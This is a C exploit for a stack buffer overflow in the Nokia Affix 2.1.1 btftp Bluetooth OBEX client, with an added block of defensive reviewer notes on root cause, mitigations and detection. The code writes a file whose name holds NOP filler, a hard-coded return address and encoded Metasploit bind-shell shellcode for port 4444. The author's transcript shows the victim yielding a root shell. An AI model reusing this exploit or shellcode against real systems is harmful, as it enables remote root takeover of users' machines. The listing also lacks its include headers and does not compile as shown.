/*
 * Remote Nokia Affix btftp client exploit
 * by kf_lists[at]secnetops[dot]com
 *
 * Author's transcript, client (victim) side:
 *
 *   threat:~# btftp
 *   Affix version: Affix 2.1.1
 *   Wellcome to OBEX ftp. Type ? for help.
 *   Mode: Bluetooth
 *   SDP: yes
 *   ftp> open 00:04:3e:65:a1:c8
 *   Connected.
 *   ftp> ls
 *   Z8Á¾ýÞ)á½Tnb 6 uûÿ¿uûÿ¿3ÉéëèÿÿÿÿÀ^vî0^îüâô¨5?Ê24ÿ¶©×?#°ÈÚ¼V6²V Ï­¹¿)ýÞ ýÞÑýÞÐÉî¼Xq¶X6¶Y0
 *   ----------------------
 *
 * Author's transcript, serving side, after the client ran "ls":
 *
 *   root@frieza:/var/spool/affix/Inbox# telnet 192.168.1.207 4444
 *   Trying 192.168.1.207...
 *   Connected to 192.168.1.207.
 *   Escape character is '^]'.
 *   id;
 *   uid=0(root) gid=0(root) groups=0(root)
 *   : command not found
 *   hostname;
 *   threat
 *   : command not found
 */

/*
 * Reviewer notes (defensive reading of this listing).
 *
 * What the program does: it builds a 250-byte string in buf (94 + 4 + 4 + 40
 * filler/address bytes followed by the 108-byte scode array) and passes that
 * string to fopen() as a FILE NAME. The file's contents ("pwned\n") are
 * irrelevant; the name is the payload. In the transcript the file sits in
 * /var/spool/affix/Inbox and the Affix 2.1.1 btftp client is affected when it
 * lists that directory with "ls".
 *
 * Root cause: presumably the client copies a remote-supplied file name into a
 * fixed-size stack buffer without a length check. The client source is not
 * part of this listing, so confirm against the vendor advisory.
 *
 * Mitigation and detection points a defender can take from the page:
 *   - The trigger is a directory listing from an untrusted OBEX peer, so the
 *     client must bound and validate names received from the remote side.
 *   - The transcript shows uid=0, i.e. btftp was run as root. Running the
 *     client unprivileged limits the impact of this bug class.
 *   - The payload relies on one hard-coded 32-bit address written twice into
 *     the name, so it assumes a predictable stack layout. Address-space
 *     randomisation and a non-executable stack would be expected to break it
 *     as written (NOTE(review): inferred from the constant, not tested).
 *   - Observable artefacts: an OBEX listing entry with a long name made of
 *     non-printable bytes (see the "ls" output above), and a new TCP listener
 *     on port 4444 on the client host after the listing.
 *
 * State of the listing: it does not compile as shown. Both #include lines
 * have lost their header names (probably stripped as markup during
 * extraction), and main() has no return type.
 */

#include /* NOTE(review): header name missing in the source as published */
#include /* NOTE(review): header name missing in the source as published */

/* Creates one file in the current working directory whose name is the crafted string. */
main()
{
    FILE *malfile; /* handle for the file that carries the crafted name */

    /* linux_ia32_bind - LPORT=4444 Size=108 Encoder=Pex http://metasploit.com */
    /* Encoded bytes; per the author's comment above, a bind payload for TCP port 4444. */
    unsigned char scode[] =
    "\x33\xc9\x83\xe9\xeb\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x99"
    "\xee\x30\x5e\x83\xee\xfc\xe2\xf4\xa8\x35\x63\x1d\xca\x84\x32\x34"
    "\xff\xb6\xa9\xd7\x78\x23\xb0\xc8\xda\xbc\x56\x36\x88\xb2\x56\x0d"
    "\x10\x0f\x5a\x38\xc1\xbe\x61\x08\x10\x0f\xfd\xde\x29\x88\xe1\xbd"
    "\x54\x6e\x62\x0c\xcf\xad\xb9\xbf\x29\x88\xfd\xde\x0a\x84\x32\x07"
    "\x29\xd1\xfd\xde\xd0\x97\xc9\xee\x92\xbc\x58\x71\xb6\x9d\x58\x36"
    "\xb6\x8c\x59\x30\x10\x0d\x62\x0d\x10\x0f\xfd\xde";

    char buf[1024]; /* holds the file name; only the first 250 bytes end up non-zero */

    /* Zero the whole buffer first: every strcat() below depends on the byte at
       its target offset still being NUL, so each one appends exactly there. */
    memset(buf,'\0',sizeof(buf));

    /* Bytes 0..93: filler (0x90). */
    memset(buf,'\x90',94);

    /* Bytes 94..97 and 98..101: the same 4-byte constant written twice.
       NOTE(review): reads as a little-endian 32-bit stack address; presumably
       it lands on a saved return address in the client. Confirm. */
    strcat(buf+94,"\x75\xfb\xff\xbf");
    strcat(buf+98,"\x75\xfb\xff\xbf");

    /* Bytes 102..141: 40 more filler bytes. */
    memset(buf+102,'\x90',40);

    /* Bytes 142..249: the encoded payload. strcat() stops at the first NUL, so
       this depends on scode containing no zero byte before its terminator. */
    strcat(buf+142,scode);

    /* The crafted string is used as the file NAME, relative to the current
       working directory; "w+" creates or truncates the file. */
    if(!(malfile = fopen(buf,"w+"))) {
        printf("error opening file\n");
        exit(1);
    }

    /* The content is a marker only; the listing never reads it back. */
    fprintf(malfile, "pwned\n" );
    fclose(malfile);
}